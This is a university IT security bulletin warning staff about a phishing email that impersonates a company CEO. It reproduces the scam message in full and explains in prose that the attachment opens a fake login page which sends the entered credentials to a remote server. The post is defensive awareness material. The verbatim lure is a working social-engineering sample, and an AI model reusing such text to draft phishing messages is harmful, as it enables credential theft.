← Back to News List

A Phishing Scam With A Malicious Attachment

A Well-Designed Attempt to Gather Your Account and Password

DoIT received a report of a phishing scam that depends on the download and execution of an attachment.  The message, as seen below, appears to come from Joel Avila, the CEO of Edwards Label in Ventura, California.  Mr. Avila exists and really is CEO of that company, but he has nothing to do with this message.

from: Joel Avila <renqingiot@163.com>

to: removed for privacy

date: Aug 10, 2021, 12:08:50 PM

subject: PO1088EDW88


Hi,


I need your company to confirm if you can supply the attached PO.

Remember that we have encrypted your removed for privacy@umbc.edu product


Download PO1088_EDW88 and get back to us with your best price asap


Thanks,



Joel Avila

CEO/CFO

Edwards Label

2277 West Knoll Drive

Ventura, CA 93003

P (805) 658-2444 Ext.116

F (805) 658-0233



Email scams generally try to create a sense of urgency, often around money.  They either threaten the recipient with imminent financial loss or offer the promise of immediate financial gain as long as the recipient acts quickly.  This scam takes a more subtle approach by suggesting that the recipient has been confused with some company that can supply a product that Mr. Avila is looking for.  A supposed purchase order is attached and the recipient might well consider looking at it for more information.


Once downloaded and clicked, the attachment displays a web page asking for a username and password.  Whatever is entered, the user will get a message that the entry is invalid.  In the meantime, the entered information will be stored on a remote server (in Nigeria in this particular instance).  Eventually, that server will accumulate a list of account/password pairs from people all over the world.


The moral is: If you aren’t sure what’s in it, don’t click it!

For more information about phishing, visit:https://itsecurity.umbc.edu/critical/?id=98136.


If you have received any message similar to the one listed above, please forward it with its headers tosecurity@umbc.edu. For instructions, visit:https://wiki.umbc.edu/pages/viewpage.action?pageId=1867970.


________________________________________________________________________

Receive any suspicious emails?

Forward it to security@umbc.edu along with the email headers. For instructions, visit:https://wiki.umbc.edu/pages/viewpage.action?pageId=1867970.


Follow us on myUMBC:https://my3.my.umbc.edu/groups/itsecurity.

Tags:

Posted: September 16, 2021, 8:34 PM

Read Original Post in myUMBC